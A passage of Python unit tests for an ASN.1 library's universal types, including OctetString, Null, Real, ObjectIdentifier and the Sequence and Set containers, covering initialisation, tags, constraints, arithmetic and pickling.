class OctetStringTestCase(BaseTestCase):
def testBinDefault(self):
class BinDefault(univ.OctetString):
defaultBinValue = '1000010111101110101111000000111011'
assert BinDefault() == univ.OctetString(binValue='1000010111101110101111000000111011')
def testHexDefault(self):
class HexDefault(univ.OctetString):
defaultHexValue = 'FA9823C43E43510DE3422'
assert HexDefault() == univ.OctetString(hexValue='FA9823C43E43510DE3422')
def testBinStr(self):
assert univ.OctetString(binValue="1000010111101110101111000000111011") == ints2octs((133, 238, 188, 14, 192)), 'bin init fails'
def testHexStr(self):
assert univ.OctetString(hexValue="FA9823C43E43510DE3422") == ints2octs((250, 152, 35, 196, 62, 67, 81, 13, 227, 66, 32)), 'hex init fails'
def testTuple(self):
assert univ.OctetString((1, 2, 3, 4, 5)) == ints2octs((1, 2, 3, 4, 5)), 'tuple init failed'
def testRepr(self):
assert 'abc' in repr(univ.OctetString('abc'))
def testEmpty(self):
try:
str(univ.OctetString())
except PyAsn1Error:
pass
else:
assert 0, 'empty OctetString() not reported'
def testTag(self):
assert univ.OctetString().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x04)
)
def testStaticDef(self):
class OctetString(univ.OctetString):
pass
assert OctetString(hexValue="FA9823C43E43510DE3422") == ints2octs((250, 152, 35, 196, 62, 67, 81, 13, 227, 66, 32))
class OctetStringPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.BitString()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.BitString
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.BitString((1, 0, 1, 0))
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == (1, 0, 1, 0)
class Null(BaseTestCase):
def testInit(self):
assert not univ.Null().isValue
assert univ.Null(0) == str2octs('')
assert univ.Null(False) == str2octs('')
assert univ.Null('') == str2octs('')
assert univ.Null(None) == str2octs('')
try:
assert univ.Null(True)
except PyAsn1Error:
pass
try:
assert univ.Null('xxx')
except PyAsn1Error:
pass
def testStr(self):
assert str(univ.Null('')) == '', 'str() fails'
def testRepr(self):
assert 'Null' in repr(univ.Null(''))
def testTag(self):
assert univ.Null().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x05)
)
def testConstraints(self):
try:
univ.Null(2)
except error.ValueConstraintError:
pass
else:
assert 0, 'constraint fail'
def testStaticDef(self):
class Null(univ.Null):
pass
assert not Null('')
class NullPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Null()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Null
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Null('')
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert not new_asn1
class RealTestCase(BaseTestCase):
def testFloat4BinEnc(self):
assert univ.Real((0.25, 2, 3)) == 2.0, 'float initializer for binary encoding fails'
def testStr(self):
assert str(univ.Real(1.0)) == '1.0', 'str() fails'
def testRepr(self):
assert 'Real' in repr(univ.Real(-4.1))
assert 'Real' in repr(univ.Real(-4.1))
assert 'inf' in repr(univ.Real('inf'))
assert '-inf' in repr(univ.Real('-inf'))
def testAdd(self):
assert univ.Real(-4.1) + 1.4 == -2.7, '__add__() fails'
def testRadd(self):
assert 4 + univ.Real(0.5) == 4.5, '__radd__() fails'
def testSub(self):
assert univ.Real(3.9) - 1.7 == 2.2, '__sub__() fails'
def testRsub(self):
assert 6.1 - univ.Real(0.1) == 6, '__rsub__() fails'
def testMul(self):
assert univ.Real(3.0) * -3 == -9, '__mul__() fails'
def testRmul(self):
assert 2 * univ.Real(3.0) == 6, '__rmul__() fails'
def testDiv(self):
assert univ.Real(3.0) / 2 == 1.5, '__div__() fails'
def testRdiv(self):
assert 6 / univ.Real(3.0) == 2, '__rdiv__() fails'
def testMod(self):
assert univ.Real(3.0) % 2 == 1, '__mod__() fails'
def testRmod(self):
assert 4 % univ.Real(3.0) == 1, '__rmod__() fails'
def testPow(self):
assert univ.Real(3.0) ** 2 == 9, '__pow__() fails'
def testRpow(self):
assert 2 ** univ.Real(2.0) == 4, '__rpow__() fails'
def testInt(self):
assert int(univ.Real(3.0)) == 3, '__int__() fails'
def testLong(self):
assert int(univ.Real(8.0)) == 8, '__long__() fails'
def testFloat(self):
assert float(univ.Real(4.0)) == 4.0, '__float__() fails'
def testPrettyIn(self):
assert univ.Real((3, 10, 0)) == 3, 'prettyIn() fails'
# infinite float values
def testStrInf(self):
assert str(univ.Real('inf')) == 'inf', 'str() fails'
def testAddInf(self):
assert univ.Real('inf') + 1 == float('inf'), '__add__() fails'
def testRaddInf(self):
assert 1 + univ.Real('inf') == float('inf'), '__radd__() fails'
def testIntInf(self):
try:
assert int(univ.Real('inf'))
except OverflowError:
pass
else:
assert 0, '__int__() fails'
def testLongInf(self):
try:
assert int(univ.Real('inf'))
except OverflowError:
pass
else:
assert 0, '__long__() fails'
assert int(univ.Real(8.0)) == 8, '__long__() fails'
def testFloatInf(self):
assert float(univ.Real('-inf')) == float('-inf'), '__float__() fails'
def testPrettyInInf(self):
assert univ.Real(float('inf')) == float('inf'), 'prettyIn() fails'
def testPlusInf(self):
assert univ.Real('inf').isPlusInf, 'isPlusInfinity failed'
def testMinusInf(self):
assert univ.Real('-inf').isMinusInf, 'isMinusInfinity failed'
def testPos(self):
assert +univ.Real(1.0) == 1.0, '__pos__() fails'
def testNeg(self):
assert -univ.Real(1.0) == -1.0, '__neg__() fails'
def testRound(self):
assert round(univ.Real(1.123), 2) == 1.12, '__round__() fails'
def testFloor(self):
assert math.floor(univ.Real(1.6)) == 1.0, '__floor__() fails'
def testCeil(self):
assert math.ceil(univ.Real(1.2)) == 2.0, '__ceil__() fails'
if sys.version_info[0:2] > (2, 5):
def testTrunc(self):
assert math.trunc(univ.Real(1.1)) == 1.0, '__trunc__() fails'
def testTag(self):
assert univ.Real().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x09)
)
def testStaticDef(self):
class Real(univ.Real):
pass
assert Real(1.0) == 1.0
class RealPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Real()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Real
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Real((1, 10, 3))
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == 1000
class ObjectIdentifier(BaseTestCase):
def testStr(self):
assert str(univ.ObjectIdentifier((1, 3, 6))) == '1.3.6', 'str() fails'
def testRepr(self):
assert '1.3.6' in repr(univ.ObjectIdentifier('1.3.6'))
def testEq(self):
assert univ.ObjectIdentifier((1, 3, 6)) == (1, 3, 6), '__cmp__() fails'
def testAdd(self):
assert univ.ObjectIdentifier((1, 3)) + (6,) == (1, 3, 6), '__add__() fails'
def testRadd(self):
assert (1,) + univ.ObjectIdentifier((3, 6)) == (1, 3, 6), '__radd__() fails'
def testLen(self):
assert len(univ.ObjectIdentifier((1, 3))) == 2, '__len__() fails'
def testPrefix(self):
o = univ.ObjectIdentifier('1.3.6')
assert o.isPrefixOf((1, 3, 6)), 'isPrefixOf() fails'
assert o.isPrefixOf((1, 3, 6, 1)), 'isPrefixOf() fails'
assert not o.isPrefixOf((1, 3)), 'isPrefixOf() fails'
def testInput1(self):
assert univ.ObjectIdentifier('1.3.6') == (1, 3, 6), 'prettyIn() fails'
def testInput2(self):
assert univ.ObjectIdentifier((1, 3, 6)) == (1, 3, 6), 'prettyIn() fails'
def testInput3(self):
assert univ.ObjectIdentifier(univ.ObjectIdentifier('1.3') + (6,)) == (1, 3, 6), 'prettyIn() fails'
def testUnicode(self):
s = '1.3.6'
if sys.version_info[0] < 3:
s = s.decode()
assert univ.ObjectIdentifier(s) == (1, 3, 6), 'unicode init fails'
def testTag(self):
assert univ.ObjectIdentifier().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x06)
)
def testContains(self):
s = univ.ObjectIdentifier('1.3.6.1234.99999')
assert 1234 in s
assert 4321 not in s
def testStaticDef(self):
class ObjectIdentifier(univ.ObjectIdentifier):
pass
assert str(ObjectIdentifier((1, 3, 6))) == '1.3.6'
class ObjectIdentifierPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.ObjectIdentifier()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.ObjectIdentifier
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.ObjectIdentifier('2.3.1.1.2')
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == (2, 3, 1, 1, 2)
class SequenceOf(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.s1 = univ.SequenceOf(
componentType=univ.OctetString('')
)
self.s2 = self.s1.clone()
def testRepr(self):
assert 'a' in repr(self.s1.clone().setComponents('a', 'b'))
def testTag(self):
assert self.s1.tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatConstructed, 0x10)
), 'wrong tagSet'
def testSeq(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
assert self.s1[0] == str2octs('abc'), 'set by idx fails'
self.s1[0] = 'cba'
assert self.s1[0] == str2octs('cba'), 'set by idx fails'
def testCmp(self):
self.s1.clear()
self.s1.setComponentByPosition(0, 'abc')
self.s2.clear()
self.s2.setComponentByPosition(0, univ.OctetString('abc'))
assert self.s1 == self.s2, '__cmp__() fails'
def testSubtypeSpec(self):
s = self.s1.clone(subtypeSpec=constraint.ConstraintsUnion(
constraint.SingleValueConstraint(str2octs('abc'))
))
try:
s.setComponentByPosition(0, univ.OctetString('abc'))
except PyAsn1Error:
assert 0, 'constraint fails'
try:
s.setComponentByPosition(1, univ.OctetString('Abc'))
except PyAsn1Error:
try:
s.setComponentByPosition(1, univ.OctetString('Abc'),
verifyConstraints=False)
except PyAsn1Error:
assert 0, 'constraint failes with verifyConstraints=True'
else:
assert 0, 'constraint fails'
def testComponentTagsMatching(self):
s = self.s1.clone()
s.strictConstraints = True # This requires types equality
o = univ.OctetString('abc').subtype(explicitTag=tag.Tag(tag.tagClassPrivate, tag.tagFormatSimple, 12))
try:
s.setComponentByPosition(0, o)
except PyAsn1Error:
pass
else:
assert 0, 'inner supertype tag allowed'
def testComponentConstraintsMatching(self):
s = self.s1.clone()
o = univ.OctetString().subtype(
subtypeSpec=constraint.ConstraintsUnion(constraint.SingleValueConstraint(str2octs('cba'))))
s.strictConstraints = True # This requires types equality
try:
s.setComponentByPosition(0, o.clone('cba'))
except PyAsn1Error:
pass
else:
assert 0, 'inner supertype constraint allowed'
s.strictConstraints = False # This requires subtype relationships
try:
s.setComponentByPosition(0, o.clone('cba'))
except PyAsn1Error:
assert 0, 'inner supertype constraint disallowed'
else:
pass
def testSizeSpec(self):
s = self.s1.clone(sizeSpec=constraint.ConstraintsUnion(
constraint.ValueSizeConstraint(1, 1)
))
s.setComponentByPosition(0, univ.OctetString('abc'))
try:
s.verifySizeSpec()
except PyAsn1Error:
assert 0, 'size spec fails'
s.setComponentByPosition(1, univ.OctetString('abc'))
try:
s.verifySizeSpec()
except PyAsn1Error:
pass
else:
assert 0, 'size spec fails'
def testGetComponentTagMap(self):
assert self.s1.componentType.tagMap.presentTypes == {
univ.OctetString.tagSet: univ.OctetString('')
}
def testSubtype(self):
self.s1.clear()
assert self.s1.subtype(
implicitTag=tag.Tag(tag.tagClassPrivate, tag.tagFormatSimple, 2),
subtypeSpec=constraint.SingleValueConstraint(1, 3),
sizeSpec=constraint.ValueSizeConstraint(0, 1)
) == self.s1.clone(
tagSet=tag.TagSet(tag.Tag(tag.tagClassPrivate,
tag.tagFormatSimple, 2)),
subtypeSpec=constraint.ConstraintsIntersection(constraint.SingleValueConstraint(1, 3)),
sizeSpec=constraint.ValueSizeConstraint(0, 1)
)
def testClone(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
s = self.s1.clone()
assert len(s) == 0
s = self.s1.clone(cloneValueFlag=1)
assert len(s) == 1
assert s.getComponentByPosition(0) == self.s1.getComponentByPosition(0)
def testSetComponents(self):
assert self.s1.clone().setComponents('abc', 'def') == \
self.s1.setComponentByPosition(0, 'abc').setComponentByPosition(1, 'def')
def testGetItem(self):
s = self.s1.clone()
s.append('xxx')
assert s[0]
try:
s[2]
except IndexError:
pass
else:
assert False, 'IndexError not raised'
# this is a deviation from standart sequence protocol
assert not s[1]
def testSetItem(self):
s = self.s1.clone()
s.append('xxx')
try:
s[2] = 'xxx'
except IndexError:
pass
else:
assert False, 'IndexError not raised'
def testAppend(self):
self.s1.clear()
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
assert len(self.s1) == 1
self.s1.append('def')
assert len(self.s1) == 2
assert list(self.s1) == [str2octs(x) for x in ['abc', 'def']]
def testExtend(self):
self.s1.clear()
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
assert len(self.s1) == 1
self.s1.extend(['def', 'ghi'])
assert len(self.s1) == 3
assert list(self.s1) == [str2octs(x) for x in ['abc', 'def', 'ghi']]
def testCount(self):
self.s1.clear()
for x in ['abc', 'def', 'abc']:
self.s1.append(x)
assert self.s1.count(str2octs('abc')) == 2
assert self.s1.count(str2octs('def')) == 1
assert self.s1.count(str2octs('ghi')) == 0
def testIndex(self):
self.s1.clear()
for x in ['abc', 'def', 'abc']:
self.s1.append(x)
assert self.s1.index(str2octs('abc')) == 0
assert self.s1.index(str2octs('def')) == 1
assert self.s1.index(str2octs('abc'), 1) == 2
def testSort(self):
self.s1.clear()
self.s1[0] = 'b'
self.s1[1] = 'a'
assert list(self.s1) == [str2octs('b'), str2octs('a')]
self.s1.sort()
assert list(self.s1) == [str2octs('a'), str2octs('b')]
def testStaticDef(self):
class SequenceOf(univ.SequenceOf):
componentType = univ.OctetString('')
s = SequenceOf()
s[0] = 'abc'
assert len(s) == 1
assert s == [str2octs('abc')]
def testLegacyInitializer(self):
n = univ.SequenceOf(
componentType=univ.OctetString()
)
o = univ.SequenceOf(
univ.OctetString() # this is the old way
)
assert n.isSameTypeWith(o) and o.isSameTypeWith(n)
n[0] = 'fox'
o[0] = 'fox'
assert n == o
def testGetComponentWithDefault(self):
class SequenceOf(univ.SequenceOf):
componentType = univ.OctetString()
s = SequenceOf()
assert s.getComponentByPosition(0, default=None, instantiate=False) is None
assert s.getComponentByPosition(0, default=None) is None
s[0] = 'test'
assert s.getComponentByPosition(0, default=None) is not None
assert s.getComponentByPosition(0, default=None) == str2octs('test')
s.clear()
assert s.getComponentByPosition(0, default=None) is None
def testGetComponentNoInstantiation(self):
class SequenceOf(univ.SequenceOf):
componentType = univ.OctetString()
s = SequenceOf()
assert s.getComponentByPosition(0, instantiate=False) is univ.noValue
s[0] = 'test'
assert s.getComponentByPosition(0, instantiate=False) is not univ.noValue
assert s.getComponentByPosition(0, instantiate=False) == str2octs('test')
s.clear()
assert s.getComponentByPosition(0, instantiate=False) is univ.noValue
class SequenceOfPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.SequenceOf(componentType=univ.OctetString())
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.SequenceOf
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.SequenceOf(componentType=univ.OctetString())
old_asn1[0] = 'test'
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1
assert new_asn1 == [str2octs('test')]
class Sequence(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.s1 = univ.Sequence(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('nick', univ.OctetString('')),
namedtype.DefaultedNamedType('age', univ.Integer(34))
)
)
def testRepr(self):
assert 'name' in repr(self.s1.clone().setComponents('a', 'b'))
def testTag(self):
assert self.s1.tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatConstructed, 0x10)
), 'wrong tagSet'
def testById(self):
self.s1.setComponentByName('name', univ.OctetString('abc'))
assert self.s1.getComponentByName('name') == str2octs('abc'), 'set by name fails'
def testByKey(self):
self.s1['name'] = 'abc'
assert self.s1['name'] == str2octs('abc'), 'set by key fails'
def testContains(self):
assert 'name' in self.s1
assert '<missing>' not in self.s1
def testGetNearPosition(self):
assert self.s1.componentType.getTagMapNearPosition(1).presentTypes == {
univ.OctetString.tagSet: univ.OctetString(''),
univ.Integer.tagSet: univ.Integer(34)
}
assert self.s1.componentType.getPositionNearType(
univ.OctetString.tagSet, 1
) == 1
def testSetDefaultComponents(self):
self.s1.clear()
self.s1.setComponentByPosition(0, univ.OctetString('Ping'))
self.s1.setComponentByPosition(1, univ.OctetString('Pong'))
assert self.s1.getComponentByPosition(2) == 34
def testClone(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
self.s1.setComponentByPosition(1, univ.OctetString('def'))
self.s1.setComponentByPosition(2, univ.Integer(123))
s = self.s1.clone()
assert s.getComponentByPosition(0) != self.s1.getComponentByPosition(0)
assert s.getComponentByPosition(1) != self.s1.getComponentByPosition(1)
assert s.getComponentByPosition(2) != self.s1.getComponentByPosition(2)
s = self.s1.clone(cloneValueFlag=1)
assert s.getComponentByPosition(0) == self.s1.getComponentByPosition(0)
assert s.getComponentByPosition(1) == self.s1.getComponentByPosition(1)
assert s.getComponentByPosition(2) == self.s1.getComponentByPosition(2)
def testComponentTagsMatching(self):
s = self.s1.clone()
s.strictConstraints = True # This requires types equality
o = univ.OctetString('abc').subtype(explicitTag=tag.Tag(tag.tagClassPrivate, tag.tagFormatSimple, 12))
try:
s.setComponentByName('name', o)
except PyAsn1Error:
pass
else:
assert 0, 'inner supertype tag allowed'
def testComponentConstraintsMatching(self):
s = self.s1.clone()
o = univ.OctetString().subtype(
subtypeSpec=constraint.ConstraintsUnion(constraint.SingleValueConstraint(str2octs('cba'))))
s.strictConstraints = True # This requires types equality
try:
s.setComponentByName('name', o.clone('cba'))
except PyAsn1Error:
pass
else:
assert 0, 'inner supertype constraint allowed'
s.strictConstraints = False # This requires subtype relationships
try:
s.setComponentByName('name', o.clone('cba'))
except PyAsn1Error:
assert 0, 'inner supertype constraint disallowed'
else:
pass
def testSetComponents(self):
assert self.s1.clone().setComponents(name='a', nick='b', age=1) == \
self.s1.setComponentByPosition(0, 'a').setComponentByPosition(1, 'b').setComponentByPosition(2, 1)
def testSetToDefault(self):
s = self.s1.clone()
s.setComponentByPosition(0, univ.noValue)
s[2] = univ.noValue
assert s[0] == univ.OctetString('')
assert s[2] == univ.Integer(34)
def testGetItem(self):
s = self.s1.clone()
s['name'] = 'xxx'
assert s['name']
assert s[0]
try:
s['xxx']
except KeyError:
pass
else:
assert False, 'KeyError not raised'
try:
s[100]
except IndexError:
pass
else:
assert False, 'IndexError not raised'
def testSetItem(self):
s = self.s1.clone()
s['name'] = 'xxx'
try:
s['xxx'] = 'xxx'
except KeyError:
pass
else:
assert False, 'KeyError not raised'
try:
s[100] = 'xxx'
except IndexError:
pass
else:
assert False, 'IndexError not raised'
def testIter(self):
assert list(self.s1) == ['name', 'nick', 'age']
def testKeys(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
self.s1.setComponentByPosition(1, univ.OctetString('def'))
self.s1.setComponentByPosition(2, univ.Integer(123))
assert list(self.s1.keys()) == ['name', 'nick', 'age']
def testValues(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
self.s1.setComponentByPosition(1, univ.OctetString('def'))
self.s1.setComponentByPosition(2, univ.Integer(123))
assert list(self.s1.values()) == [str2octs('abc'), str2octs('def'), 123]
def testItems(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
self.s1.setComponentByPosition(1, univ.OctetString('def'))
self.s1.setComponentByPosition(2, univ.Integer(123))
assert list(self.s1.items()) == [(x[0], str2octs(x[1])) for x in [('name', 'abc'), ('nick', 'def')]] + [('age', 123)]
def testUpdate(self):
self.s1.clear()
assert list(self.s1.values()) == [str2octs(''), str2octs(''), 34]
self.s1.update(**{'name': 'abc', 'nick': 'def', 'age': 123})
assert list(self.s1.items()) == [(x[0], str2octs(x[1])) for x in [('name', 'abc'), ('nick', 'def')]] + [('age', 123)]
self.s1.update(('name', 'ABC'))
assert list(self.s1.items()) == [(x[0], str2octs(x[1])) for x in [('name', 'ABC'), ('nick', 'def')]] + [('age', 123)]
self.s1.update(name='CBA')
assert list(self.s1.items()) == [(x[0], str2octs(x[1])) for x in [('name', 'CBA'), ('nick', 'def')]] + [('age', 123)]
def testStaticDef(self):
class Sequence(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('nick', univ.OctetString('')),
namedtype.DefaultedNamedType('age', univ.Integer(34))
)
s = Sequence()
s['name'] = 'abc'
assert s['name'] == str2octs('abc')
def testGetComponentWithDefault(self):
class Sequence(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('nick', univ.OctetString()),
)
s = Sequence()
assert s[0] == str2octs('')
assert s.getComponentByPosition(1, default=None, instantiate=False) is None
assert s.getComponentByName('nick', default=None) is None
s[1] = 'test'
assert s.getComponentByPosition(1, default=None) is not None
assert s.getComponentByPosition(1, default=None) == str2octs('test')
s.clear()
assert s.getComponentByPosition(1, default=None) is None
def testGetComponentNoInstantiation(self):
class Sequence(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('nick', univ.OctetString()),
)
s = Sequence()
assert s[0] == str2octs('')
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
assert s.getComponentByName('nick', instantiate=False) is univ.noValue
s[1] = 'test'
assert s.getComponentByPosition(1, instantiate=False) is not univ.noValue
assert s.getComponentByPosition(1, instantiate=False) == str2octs('test')
s.clear()
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
class SequenceWithoutSchema(BaseTestCase):
def testGetItem(self):
s = univ.Sequence()
s.setComponentByPosition(0, univ.OctetString('abc'))
s[0] = 'abc'
assert s['field-0']
assert s[0]
try:
s['field-1']
except KeyError:
pass
else:
assert False, 'KeyError not raised'
def testSetItem(self):
s = univ.Sequence()
s.setComponentByPosition(0, univ.OctetString('abc'))
s['field-0'] = 'xxx'
try:
s['field-1'] = 'xxx'
except KeyError:
pass
else:
assert False, 'KeyError not raised'
def testIter(self):
s = univ.Sequence()
s.setComponentByPosition(0, univ.OctetString('abc'))
s.setComponentByPosition(1, univ.Integer(123))
assert list(s) == ['field-0', 'field-1']
def testKeys(self):
s = univ.Sequence()
s.setComponentByPosition(0, univ.OctetString('abc'))
s.setComponentByPosition(1, univ.Integer(123))
assert list(s.keys()) == ['field-0', 'field-1']
def testValues(self):
s = univ.Sequence()
s.setComponentByPosition(0, univ.OctetString('abc'))
s.setComponentByPosition(1, univ.Integer(123))
assert list(s.values()) == [str2octs('abc'), 123]
def testItems(self):
s = univ.Sequence()
s.setComponentByPosition(0, univ.OctetString('abc'))
s.setComponentByPosition(1, univ.Integer(123))
assert list(s.items()) == [('field-0', str2octs('abc')), ('field-1', 123)]
def testUpdate(self):
s = univ.Sequence()
assert not s
s.setComponentByPosition(0, univ.OctetString('abc'))
s.setComponentByPosition(1, univ.Integer(123))
assert s
assert list(s.keys()) == ['field-0', 'field-1']
assert list(s.values()) == [str2octs('abc'), 123]
assert list(s.items()) == [('field-0', str2octs('abc')), ('field-1', 123)]
s['field-0'] = univ.OctetString('def')
assert list(s.values()) == [str2octs('def'), 123]
s['field-1'] = univ.OctetString('ghi')
assert list(s.values()) == [str2octs('def'), str2octs('ghi')]
try:
s['field-2'] = univ.OctetString('xxx')
except KeyError:
pass
else:
assert False, 'unknown field at schema-less object tolerated'
assert 'field-0' in s
s.clear()
assert 'field-0' not in s
class SequencePicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Sequence(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString())
)
)
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Sequence
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Sequence(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString())
)
)
old_asn1['name'] = 'test'
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1
assert new_asn1['name'] == str2octs('test')
class SetOf(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.s1 = univ.SetOf(componentType=univ.OctetString(''))
def testTag(self):
assert self.s1.tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatConstructed, 0x11)
), 'wrong tagSet'
def testSeq(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
assert self.s1[0] == str2octs('abc'), 'set by idx fails'
self.s1.setComponentByPosition(0, self.s1[0].clone('cba'))
assert self.s1[0] == str2octs('cba'), 'set by idx fails'
def testStaticDef(self):
class SetOf(univ.SequenceOf):
componentType = univ.OctetString('')
s = SetOf()
s[0] = 'abc'
assert len(s) == 1
assert s == [str2octs('abc')]
class SetOfPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.SetOf(componentType=univ.OctetString())
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.SetOf
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.SetOf(componentType=univ.OctetString())
old_asn1[0] = 'test'
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1
assert new_asn1 == [str2octs('test')]
class Set(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.s1 = univ.Set(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('null', univ.Null('')),
namedtype.DefaultedNamedType('age', univ.Integer(34))
)
)
self.s2 = self.s1.clone()
def testTag(self):
assert self.s1.tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatConstructed, 0x11)
), 'wrong tagSet'
def testByTypeWithPythonValue(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert self.s1.getComponentByType(
univ.OctetString.tagSet
) == str2octs('abc'), 'set by name fails'
def testByTypeWithInstance(self):
self.s1.setComponentByType(univ.OctetString.tagSet, univ.OctetString('abc'))
assert self.s1.getComponentByType(
univ.OctetString.tagSet
) == str2octs('abc'), 'set by name fails'
def testGetTagMap(self):
assert self.s1.tagMap.presentTypes == {
univ.Set.tagSet: univ.Set()
}
def testGetComponentTagMap(self):
assert self.s1.componentType.tagMapUnique.presentTypes == {
univ.OctetString.tagSet: univ.OctetString(''),
univ.Null.tagSet: univ.Null(''),
univ.Integer.tagSet: univ.Integer(34)
}
def testGetPositionByType(self):
assert self.s1.componentType.getPositionByType(univ.Null().tagSet) == 1
def testSetToDefault(self):
self.s1.setComponentByName('name', univ.noValue)
assert self.s1['name'] == univ.OctetString('')
def testIter(self):
assert list(self.s1) == ['name', 'null', 'age']
def testStaticDef(self):
class Set(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('nick', univ.OctetString('')),
namedtype.DefaultedNamedType('age', univ.Integer(34))
)
s = Set()
s['name'] = 'abc'
assert s['name'] == str2octs('abc')
def testGetComponentWithDefault(self):
class Set(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.NamedType('id', univ.Integer(123)),
namedtype.OptionalNamedType('nick', univ.OctetString()),
)
s = Set()
assert s[0] == 123
assert s.getComponentByPosition(1, default=None, instantiate=False) is None
assert s.getComponentByName('nick', default=None) is None
s[1] = 'test'
assert s.getComponentByPosition(1, default=None) is not None
assert s.getComponentByPosition(1, default=None) == str2octs('test')
s.clear()
assert s.getComponentByPosition(1, default=None) is None
def testGetComponentNoInstantiation(self):
class Set(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.NamedType('id', univ.Integer(123)),
namedtype.OptionalNamedType('nick', univ.OctetString()),
)
s = Set()
assert s[0] == 123
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
assert s.getComponentByName('nick', instantiate=False) is univ.noValue
assert s.getComponentByType(univ.OctetString.tagSet, instantiate=False) is univ.noValue
s[1] = 'test'
assert s.getComponentByPosition(1, instantiate=False) is not univ.noValue
assert s.getComponentByPosition(1, instantiate=False) == str2octs('test')
s.clear()
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
class SetPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Set(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString())
)
)
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Set
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Set(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString())
)
)
